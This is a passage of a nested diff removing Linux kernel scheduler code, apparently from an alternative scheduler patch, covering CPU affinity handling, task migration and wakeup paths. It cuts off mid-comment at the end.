-+	if (task_rq(p) == rq && task_on_rq_queued(p))
-+		rq = __migrate_task(rq, p, arg->dest_cpu);
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	return 0;
-+}
-+
-+static inline void
-+set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	cpumask_copy(&p->cpus_mask, new_mask);
-+	p->nr_cpus_allowed = cpumask_weight(new_mask);
-+}
-+
-+static void
-+__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	lockdep_assert_held(&p->pi_lock);
-+	set_cpus_allowed_common(p, new_mask);
-+}
-+
-+void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	__do_set_cpus_allowed(p, new_mask);
-+}
-+
-+int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
-+		      int node)
-+{
-+	if (!src->user_cpus_ptr)
-+		return 0;
-+
-+	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
-+	if (!dst->user_cpus_ptr)
-+		return -ENOMEM;
-+
-+	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
-+	return 0;
-+}
-+
-+static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = NULL;
-+
-+	swap(p->user_cpus_ptr, user_mask);
-+
-+	return user_mask;
-+}
-+
-+void release_user_cpus_ptr(struct task_struct *p)
-+{
-+	kfree(clear_user_cpus_ptr(p));
-+}
-+
-+#endif
-+
-+/**
-+ * task_curr - is this task currently executing on a CPU?
-+ * @p: the task in question.
-+ *
-+ * Return: 1 if the task is currently executing. 0 otherwise.
-+ */
-+inline int task_curr(const struct task_struct *p)
-+{
-+	return cpu_curr(task_cpu(p)) == p;
-+}
-+
-+#ifdef CONFIG_SMP
-+/*
-+ * wait_task_inactive - wait for a thread to unschedule.
-+ *
-+ * Wait for the thread to block in any of the states set in @match_state.
-+ * If it changes, i.e. @p might have woken up, then return zero.  When we
-+ * succeed in waiting for @p to be off its CPU, we return a positive number
-+ * (its total switch count).  If a second call a short while later returns the
-+ * same number, the caller can be sure that @p has remained unscheduled the
-+ * whole time.
-+ *
-+ * The caller must ensure that the task *will* unschedule sometime soon,
-+ * else this function might spin for a *long* time. This function can't
-+ * be called with interrupts off, or it may introduce deadlock with
-+ * smp_call_function() if an IPI is sent by the same process we are
-+ * waiting to become inactive.
-+ */
-+unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
-+{
-+	unsigned long flags;
-+	bool running, on_rq;
-+	unsigned long ncsw;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+
-+		/*
-+		 * If the task is actively running on another CPU
-+		 * still, just relax and busy-wait without holding
-+		 * any locks.
-+		 *
-+		 * NOTE! Since we don't hold any locks, it's not
-+		 * even sure that "rq" stays as the right runqueue!
-+		 * But we don't care, since this will return false
-+		 * if the runqueue has changed and p is actually now
-+		 * running somewhere else!
-+		 */
-+		while (task_on_cpu(p) && p == rq->curr) {
-+			if (!(READ_ONCE(p->__state) & match_state))
-+				return 0;
-+			cpu_relax();
-+		}
-+
-+		/*
-+		 * Ok, time to look more closely! We need the rq
-+		 * lock now, to be *sure*. If we're wrong, we'll
-+		 * just go back and repeat.
-+		 */
-+		task_access_lock_irqsave(p, &lock, &flags);
-+		trace_sched_wait_task(p);
-+		running = task_on_cpu(p);
-+		on_rq = p->on_rq;
-+		ncsw = 0;
-+		if (READ_ONCE(p->__state) & match_state)
-+			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
-+		task_access_unlock_irqrestore(p, lock, &flags);
-+
-+		/*
-+		 * If it changed from the expected state, bail out now.
-+		 */
-+		if (unlikely(!ncsw))
-+			break;
-+
-+		/*
-+		 * Was it really running after all now that we
-+		 * checked with the proper locks actually held?
-+		 *
-+		 * Oops. Go back and try again..
-+		 */
-+		if (unlikely(running)) {
-+			cpu_relax();
-+			continue;
-+		}
-+
-+		/*
-+		 * It's not enough that it's not actively running,
-+		 * it must be off the runqueue _entirely_, and not
-+		 * preempted!
-+		 *
-+		 * So if it was still runnable (but just not actively
-+		 * running right now), it's preempted, and we should
-+		 * yield - it could be a while.
-+		 */
-+		if (unlikely(on_rq)) {
-+			ktime_t to = NSEC_PER_SEC / HZ;
-+
-+			set_current_state(TASK_UNINTERRUPTIBLE);
-+			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
-+			continue;
-+		}
-+
-+		/*
-+		 * Ahh, all good. It wasn't running, and it wasn't
-+		 * runnable, which means that it will never become
-+		 * running in the future either. We're all done!
-+		 */
-+		break;
-+	}
-+
-+	return ncsw;
-+}
-+
-+/***
-+ * kick_process - kick a running thread to enter/exit the kernel
-+ * @p: the to-be-kicked thread
-+ *
-+ * Cause a process which is running on another CPU to enter
-+ * kernel mode without any delay (e.g. to get signals handled).
-+ *
-+ * NOTE: this function doesn't have to take the runqueue lock,
-+ * because all it wants to ensure is that the remote task enters
-+ * the kernel. If the IPI races and the task has been migrated
-+ * to another CPU then no harm is done and the purpose has been
-+ * achieved as well.
-+ */
-+void kick_process(struct task_struct *p)
-+{
-+	int cpu;
-+
-+	preempt_disable();
-+	cpu = task_cpu(p);
-+	if ((cpu != smp_processor_id()) && task_curr(p))
-+		smp_send_reschedule(cpu);
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(kick_process);
-+
-+/*
-+ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
-+ *
-+ * A few notes on cpu_active vs cpu_online:
-+ *
-+ *  - cpu_active must be a subset of cpu_online
-+ *
-+ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
-+ *    see __set_cpus_allowed_ptr(). At this point the newly online
-+ *    CPU isn't yet part of the sched domains, and balancing will not
-+ *    see it.
-+ *
-+ *  - on cpu-down we clear cpu_active() to mask the sched domains and
-+ *    prevent the load balancer from placing new tasks on the to-be-removed
-+ *    CPU. Existing tasks will remain running there and will be taken
-+ *    off.
-+ *
-+ * This means that fallback selection must not select !active CPUs, and
-+ * can assume that any active CPU must be online. Conversely,
-+ * select_task_rq() below may allow selection of !active CPUs in order
-+ * to satisfy the above rules.
-+ */
-+static int select_fallback_rq(int cpu, struct task_struct *p)
-+{
-+	int nid = cpu_to_node(cpu);
-+	const struct cpumask *nodemask = NULL;
-+	enum { cpuset, possible, fail } state = cpuset;
-+	int dest_cpu;
-+
-+	/*
-+	 * If the node that the CPU is on has been offlined, cpu_to_node()
-+	 * will return -1. There is no CPU on the node, and we should
-+	 * select the CPU on the other node.
-+	 */
-+	if (nid != -1) {
-+		nodemask = cpumask_of_node(nid);
-+
-+		/* Look for allowed, online CPU in same node. */
-+		for_each_cpu(dest_cpu, nodemask) {
-+			if (is_cpu_allowed(p, dest_cpu))
-+				return dest_cpu;
-+		}
-+	}
-+
-+	for (;;) {
-+		/* Any allowed, online CPU? */
-+		for_each_cpu(dest_cpu, p->cpus_ptr) {
-+			if (!is_cpu_allowed(p, dest_cpu))
-+				continue;
-+			goto out;
-+		}
-+
-+		/* No more Mr. Nice Guy. */
-+		switch (state) {
-+		case cpuset:
-+			if (cpuset_cpus_allowed_fallback(p)) {
-+				state = possible;
-+				break;
-+			}
-+			fallthrough;
-+		case possible:
-+			/*
-+			 * XXX When called from select_task_rq() we only
-+			 * hold p->pi_lock and again violate locking order.
-+			 *
-+			 * More yuck to audit.
-+			 */
-+			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
-+			state = fail;
-+			break;
-+
-+		case fail:
-+			BUG();
-+			break;
-+		}
-+	}
-+
-+out:
-+	if (state != cpuset) {
-+		/*
-+		 * Don't tell them about moving exiting tasks or
-+		 * kernel threads (both mm NULL), since they never
-+		 * leave kernel.
-+		 */
-+		if (p->mm && printk_ratelimit()) {
-+			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
-+					task_pid_nr(p), p->comm, cpu);
-+		}
-+	}
-+
-+	return dest_cpu;
-+}
-+
-+static inline void
-+sched_preempt_mask_flush(cpumask_t *mask, int prio)
-+{
-+	int cpu;
-+
-+	cpumask_copy(mask, sched_idle_mask);
-+
-+	for_each_cpu_not(cpu, mask) {
-+		if (prio < cpu_rq(cpu)->prio)
-+			cpumask_set_cpu(cpu, mask);
-+	}
-+}
-+
-+static inline int
-+preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
-+{
-+	int task_prio = task_sched_prio(p);
-+	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
-+	int pr = atomic_read(&sched_prio_record);
-+
-+	if (pr != task_prio) {
-+		sched_preempt_mask_flush(mask, task_prio);
-+		atomic_set(&sched_prio_record, task_prio);
-+	}
-+
-+	return cpumask_and(preempt_mask, allow_mask, mask);
-+}
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	cpumask_t allow_mask, mask;
-+
-+	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
-+		return select_fallback_rq(task_cpu(p), p);
-+
-+	if (
-+#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
-+#endif
-+	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
-+	    preempt_mask_check(p, &allow_mask, &mask))
-+		return best_mask_cpu(task_cpu(p), &mask);
-+
-+	return best_mask_cpu(task_cpu(p), &allow_mask);
-+}
-+
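-+/*
-+ * Reading the cascade above: an idle SMT group is preferred first (under
-+ * CONFIG_SCHED_SMT), then any idle CPU, then a CPU running at a priority
-+ * the task can preempt, and only then the best CPU of the plain allowed
-+ * mask.
-+ */
-+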
-+void sched_set_stop_task(int cpu, struct task_struct *stop)
-+{
-+	static struct lock_class_key stop_pi_lock;
-+	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
-+	struct sched_param start_param = { .sched_priority = 0 };
-+	struct task_struct *old_stop = cpu_rq(cpu)->stop;
-+
-+	if (stop) {
-+		/*
-+		 * Make it appear like a SCHED_FIFO task; it's something
-+		 * userspace knows about and won't get confused about.
-+		 *
-+		 * Also, it will make PI more or less work without too
-+		 * much confusion -- but then, stop work should not
-+		 * rely on PI working anyway.
-+		 */
-+		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
-+
-+		/*
-+		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
-+		 * adjust the effective priority of a task. As a result,
-+		 * rt_mutex_setprio() can trigger (RT) balancing operations,
-+		 * which can then trigger wakeups of the stop thread to push
-+		 * around the current task.
-+		 *
-+		 * The stop task itself will never be part of the PI-chain, it
-+		 * never blocks, therefore that ->pi_lock recursion is safe.
-+		 * Tell lockdep about this by placing the stop->pi_lock in its
-+		 * own class.
-+		 */
-+		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
-+	}
-+
-+	cpu_rq(cpu)->stop = stop;
-+
-+	if (old_stop) {
-+		/*
-+		 * Reset it back to a normal scheduling policy so that
-+		 * it can die in pieces.
-+		 */
-+		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
-+	}
-+}
-+
-+static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
-+			    raw_spinlock_t *lock, unsigned long irq_flags)
-+{
-+	/* Can the task run on the task's current CPU? If so, we're done */
-+	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
-+		if (p->migration_disabled) {
-+			if (likely(p->cpus_ptr != &p->cpus_mask))
-+				__do_set_cpus_ptr(p, &p->cpus_mask);
-+			p->migration_disabled = 0;
-+			p->migration_flags |= MDF_FORCE_ENABLED;
-+			/* When p is migrate_disabled, rq->lock should be held */
-+			rq->nr_pinned--;
-+		}
-+
-+		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
-+			struct migration_arg arg = { p, dest_cpu };
-+
-+			/* Need help from migration thread: drop lock and wait. */
-+			__task_access_unlock(p, lock);
-+			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+			return 0;
-+		}
-+		if (task_on_rq_queued(p)) {
-+			/*
-+			 * OK, since we're going to drop the lock immediately
-+			 * afterwards anyway.
-+			 */
-+			update_rq_clock(rq);
-+			rq = move_queued_task(rq, p, dest_cpu);
-+			lock = &rq->lock;
-+		}
-+	}
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	return 0;
-+}
-+
-+static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
-+					 const struct cpumask *new_mask,
-+					 u32 flags,
-+					 struct rq *rq,
-+					 raw_spinlock_t *lock,
-+					 unsigned long irq_flags)
-+{
-+	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
-+	const struct cpumask *cpu_valid_mask = cpu_active_mask;
-+	bool kthread = p->flags & PF_KTHREAD;
-+	struct cpumask *user_mask = NULL;
-+	int dest_cpu;
-+	int ret = 0;
-+
-+	if (kthread || is_migration_disabled(p)) {
-+		/*
-+		 * Kernel threads are allowed on online && !active CPUs,
-+		 * however, during cpu-hot-unplug, even these might get pushed
-+		 * away if not KTHREAD_IS_PER_CPU.
-+		 *
-+		 * Specifically, migration_disabled() tasks must not fail the
-+		 * cpumask_any_and_distribute() pick below, esp. so on
-+		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
-+		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
-+		 */
-+		cpu_valid_mask = cpu_online_mask;
-+	}
-+
-+	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	/*
-+	 * Must re-check here, to close a race against __kthread_bind(),
-+	 * sched_setaffinity() is not guaranteed to observe the flag.
-+	 */
-+	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	if (cpumask_equal(&p->cpus_mask, new_mask))
-+		goto out;
-+
-+	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
-+	if (dest_cpu >= nr_cpu_ids) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	__do_set_cpus_allowed(p, new_mask);
-+
-+	if (flags & SCA_USER)
-+		user_mask = clear_user_cpus_ptr(p);
-+
-+	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
-+
-+	kfree(user_mask);
-+
-+	return ret;
-+
-+out:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+
-+	return ret;
-+}
-+
-+/*
-+ * Change a given task's CPU affinity. Migrate the thread to a
-+ * proper CPU and schedule it away if the CPU it's executing on
-+ * is removed from the allowed bitmask.
-+ *
-+ * NOTE: the caller must have a valid reference to the task, the
-+ * task must not exit() & deallocate itself prematurely. The
-+ * call is not atomic; no spinlocks may be held.
-+ */
-+static int __set_cpus_allowed_ptr(struct task_struct *p,
-+				  const struct cpumask *new_mask, u32 flags)
-+{
-+	unsigned long irq_flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
-+}
-+
-+int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	return __set_cpus_allowed_ptr(p, new_mask, 0);
-+}
-+EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
-+
-+/*
-+ * Change a given task's CPU affinity to the intersection of its current
-+ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
-+ * and pointing @p->user_cpus_ptr to a copy of the old mask.
-+ * If the resulting mask is empty, leave the affinity unchanged and return
-+ * -EINVAL.
-+ */
-+static int restrict_cpus_allowed_ptr(struct task_struct *p,
-+				     struct cpumask *new_mask,
-+				     const struct cpumask *subset_mask)
-+{
-+	struct cpumask *user_mask = NULL;
-+	unsigned long irq_flags;
-+	raw_spinlock_t *lock;
-+	struct rq *rq;
-+	int err;
-+
-+	if (!p->user_cpus_ptr) {
-+		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
-+		if (!user_mask)
-+			return -ENOMEM;
-+	}
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
-+		err = -EINVAL;
-+		goto err_unlock;
-+	}
-+
-+	/*
-+	 * We're about to butcher the task affinity, so keep track of what
-+	 * the user asked for in case we're able to restore it later on.
-+	 */
-+	if (user_mask) {
-+		cpumask_copy(user_mask, p->cpus_ptr);
-+		p->user_cpus_ptr = user_mask;
-+	}
-+
-+	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
-+
-+err_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	kfree(user_mask);
-+	return err;
-+}
-+
-+/*
-+ * Restrict the CPU affinity of task @p so that it is a subset of
-+ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
-+ * old affinity mask. If the resulting mask is empty, we warn and walk
-+ * up the cpuset hierarchy until we find a suitable mask.
-+ */
-+void force_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	cpumask_var_t new_mask;
-+	const struct cpumask *override_mask = task_cpu_possible_mask(p);
-+
-+	alloc_cpumask_var(&new_mask, GFP_KERNEL);
-+
-+	/*
-+	 * __migrate_task() can fail silently in the face of concurrent
-+	 * offlining of the chosen destination CPU, so take the hotplug
-+	 * lock to ensure that the migration succeeds.
-+	 */
-+	cpus_read_lock();
-+	if (!cpumask_available(new_mask))
-+		goto out_set_mask;
-+
-+	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
-+		goto out_free_mask;
-+
-+	/*
-+	 * We failed to find a valid subset of the affinity mask for the
-+	 * task, so override it based on its cpuset hierarchy.
-+	 */
-+	cpuset_cpus_allowed(p, new_mask);
-+	override_mask = new_mask;
-+
-+out_set_mask:
-+	if (printk_ratelimit()) {
-+		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
-+				task_pid_nr(p), p->comm,
-+				cpumask_pr_args(override_mask));
-+	}
-+
-+	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
-+out_free_mask:
-+	cpus_read_unlock();
-+	free_cpumask_var(new_mask);
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
-+
-+/*
-+ * Restore the affinity of a task @p which was previously restricted by a
-+ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
-+ * @p->user_cpus_ptr.
-+ *
-+ * It is the caller's responsibility to serialise this with any calls to
-+ * force_compatible_cpus_allowed_ptr(@p).
-+ */
-+void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = p->user_cpus_ptr;
-+	unsigned long flags;
-+
-+	/*
-+	 * Try to restore the old affinity mask. If this fails, then
-+	 * we free the mask explicitly to avoid it being inherited across
-+	 * a subsequent fork().
-+	 */
-+	if (!user_mask || !__sched_setaffinity(p, user_mask))
-+		return;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	user_mask = clear_user_cpus_ptr(p);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	kfree(user_mask);
-+}
-+
-+#else /* CONFIG_SMP */
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+static inline int
-+__set_cpus_allowed_ptr(struct task_struct *p,
-+		       const struct cpumask *new_mask, u32 flags)
-+{
-+	return set_cpus_allowed_ptr(p, new_mask);
-+}
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return false;
-+}
-+
-+#endif /* !CONFIG_SMP */
-+
-+static void
-+ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq;
-+
-+	if (!schedstat_enabled())
-+		return;
-+
-+	rq = this_rq();
-+
-+#ifdef CONFIG_SMP
-+	if (cpu == rq->cpu) {
-+		__schedstat_inc(rq->ttwu_local);
-+		__schedstat_inc(p->stats.nr_wakeups_local);
-+	} else {
-+		/* Alt schedule FW ToDo:
-+		 * how to do ttwu_wake_remote
-+		 */
-+	}
-+#endif /* CONFIG_SMP */
-+
-+	__schedstat_inc(rq->ttwu_count);
-+	__schedstat_inc(p->stats.nr_wakeups);
-+}
-+
-+/*
-+ * Mark the task runnable and perform wakeup-preemption.
-+ */
-+static inline void
-+ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	check_preempt_curr(rq);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	trace_sched_wakeup(p);
-+}
-+
-+static inline void
-+ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	if (p->sched_contributes_to_load)
-+		rq->nr_uninterruptible--;
-+
-+	if (
-+#ifdef CONFIG_SMP
-+	    !(wake_flags & WF_MIGRATED) &&
-+#endif
-+	    p->in_iowait) {
-+		delayacct_blkio_end(p);
-+		atomic_dec(&task_rq(p)->nr_iowait);
-+	}
-+
-+	activate_task(p, rq);
-+	ttwu_do_wakeup(rq, p, 0);
-+}
-+
-+/*
-+ * Consider @p being inside a wait loop:
-+ *
-+ *   for (;;) {
-+ *      set_current_state(TASK_UNINTERRUPTIBLE);
-+ *
-+ *      if (CONDITION)
-+ *         break;
-+ *
-+ *      schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ * between set_current_state() and schedule(). In this case @p is still
-+ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
-+ * an atomic manner.
-+ *
-+ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
-+ * then schedule() must still happen and p->state can be changed to
-+ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
-+ * need to do a full wakeup with enqueue.
-+ *
-+ * Returns: %true when the wakeup is done,
-+ *          %false otherwise.
-+ */
-+static int ttwu_runnable(struct task_struct *p, int wake_flags)
-+{
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	int ret = 0;
-+
-+	rq = __task_access_lock(p, &lock);
-+	if (task_on_rq_queued(p)) {
-+		/* check_preempt_curr() may use rq clock */
-+		update_rq_clock(rq);
-+		ttwu_do_wakeup(rq, p, wake_flags);
-+		ret = 1;
-+	}
-+	__task_access_unlock(p, lock);
-+
-+	return ret;
-+}
-+
-+#ifdef CONFIG_SMP
-+void sched_ttwu_pending(void *arg)
-+{
-+	struct llist_node *llist = arg;
-+	struct rq *rq = this_rq();
-+	struct task_struct *p, *t;
-+	struct rq_flags rf;
-+
-+	if (!llist)
-+		return;
-+
-+	/*
-+	 * rq::ttwu_pending is a racy indication of outstanding wakeups.
-+	 * Races such that false-negatives are possible, since they
-+	 * are shorter lived than false-positives would be.
-+	 */
-+	WRITE_ONCE(rq->ttwu_pending, 0);
-+
-+	rq_lock_irqsave(rq, &rf);
-+	update_rq_clock(rq);
-+
-+	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
-+		if (WARN_ON_ONCE(p->on_cpu))
-+			smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
-+			set_task_cpu(p, cpu_of(rq));
-+
-+		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
-+	}
-+
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+void send_call_function_single_ipi(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (!set_nr_if_polling(rq->idle))
-+		arch_send_call_function_single_ipi(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+/*
-+ * Queue a task on the target CPU's wake_list and wake the CPU via IPI if
-+ * necessary. The wakee CPU on receipt of the IPI will queue the task
-+ * via sched_ttwu_pending() for activation so the wakee incurs the cost
-+ * of the wakeup instead of the waker.
-+ */
-+static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
-+
-+	WRITE_ONCE(rq->ttwu_pending, 1);
-+	__smp_call_single_queue(cpu, &p->wake_entry.llist);
-+}
-+
-+static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
-+{
-+	/*
-+	 * Do not complicate things with the async wake_list while the CPU is
-+	 * in hotplug state.
-+	 */
-+	if (!cpu_active(cpu))
-+		return false;
-+
-+	/* Ensure the task will still be allowed to run on the CPU. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/*
-+	 * If the CPU does not share cache, then queue the task on the
-+	 * remote rq's wakelist to avoid accessing remote data.
-+	 */
-+	if (!cpus_share_cache(smp_processor_id(), cpu))
-+		return true;
-+
-+	if (cpu == smp_processor_id())
-+		return false;
-+
-+	/*
-+	 * If the wakee CPU is idle, or the task is descheduling and is the
-+	 * only running task on the CPU, then use the wakelist to offload
-+	 * the task activation to the idle (or soon-to-be-idle) CPU as
-+	 * the current CPU is likely busy. nr_running is checked to
-+	 * avoid unnecessary task stacking.
-+	 *
-+	 * Note that we can only get here with (wakee) p->on_rq=0,
-+	 * p->on_cpu can be whatever, we've done the dequeue, so
-+	 * the wakee has been accounted out of ->nr_running.
-+	 */
-+	if (!cpu_rq(cpu)->nr_running)
-+		return true;
-+
-+	return false;
-+}
-+
-+static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
-+		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
-+		__ttwu_queue_wakelist(p, cpu, wake_flags);
-+		return true;
-+	}
-+
-+	return false;
-+}
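-+
-+/*
-+ * Illustrative example (annotation only, not part of this patch): with
-+ * ALT_SCHED_TTWU_QUEUE defined, a wakeup issued on CPU0 for a task whose
-+ * target CPU is in a different LLC domain passes ttwu_queue_cond() and is
-+ * queued on that CPU's wake_list; the IPI handler finishes the activation
-+ * in sched_ttwu_pending(), so CPU0 never takes the remote rq->lock.
-+ */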
-+
-+void wake_up_if_idle(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	rcu_read_lock();
-+
-+	if (!is_idle_task(rcu_dereference(rq->curr)))
-+		goto out;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (is_idle_task(rq->curr))
-+		resched_curr(rq);
-+	/* Else CPU is not idle, do nothing here */
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out:
-+	rcu_read_unlock();
-+}
-+
-+bool cpus_share_cache(int this_cpu, int that_cpu)
-+{
-+	if (this_cpu == that_cpu)
-+		return true;
-+
-+	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
-+}
-+#else /* !CONFIG_SMP */
-+
-+static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	return false;
-+}
-+
-+#endif /* CONFIG_SMP */
-+
-+static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (ttwu_queue_wakelist(p, cpu, wake_flags))
-+		return;
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+	ttwu_do_activate(rq, p, wake_flags);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Invoked from try_to_wake_up() to check whether the task can be woken up.
-+ *
-+ * The caller holds p::pi_lock if p != current or has preemption
-+ * disabled when p == current.
-+ *
-+ * The rules of PREEMPT_RT saved_state:
-+ *
-+ *   The related locking code always holds p::pi_lock when updating
-+ *   p::saved_state, which means the code is fully serialized in both cases.
-+ *
-+ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
-+ *   bits set. This allows to distinguish all wakeup scenarios.
-+ */
-+static __always_inline
-+bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
-+{
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
-+		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
-+			     state != TASK_RTLOCK_WAIT);
-+	}
-+
-+	if (READ_ONCE(p->__state) & state) {
-+		*success = 1;
-+		return true;
-+	}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+	/*
-+	 * Saved state preserves the task state across blocking on
-+	 * an RT lock.  If the state matches, set p::saved_state to
-+	 * TASK_RUNNING, but do not wake the task because it waits
-+	 * for a lock wakeup. Also indicate success because from
-+	 * the regular waker's point of view this has succeeded.
-+	 *
-+	 * After acquiring the lock the task will restore p::__state
-+	 * from p::saved_state which ensures that the regular
-+	 * wakeup is not lost. The restore will also set
-+	 * p::saved_state to TASK_RUNNING so any further tests will
-+	 * not result in false positives vs. @success
-+	 */
-+	if (p->saved_state & state) {
-+		p->saved_state = TASK_RUNNING;
-+		*success = 1;
-+	}
-+#endif
-+	return false;
-+}
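-+
-+/*
-+ * Illustrative example (not part of this patch): a waker using TASK_NORMAL
-+ * (TASK_INTERRUPTIBLE | TASK_UNINTERRUPTIBLE) matches either sleep state:
-+ *
-+ *   WRITE_ONCE(p->__state, TASK_UNINTERRUPTIBLE);
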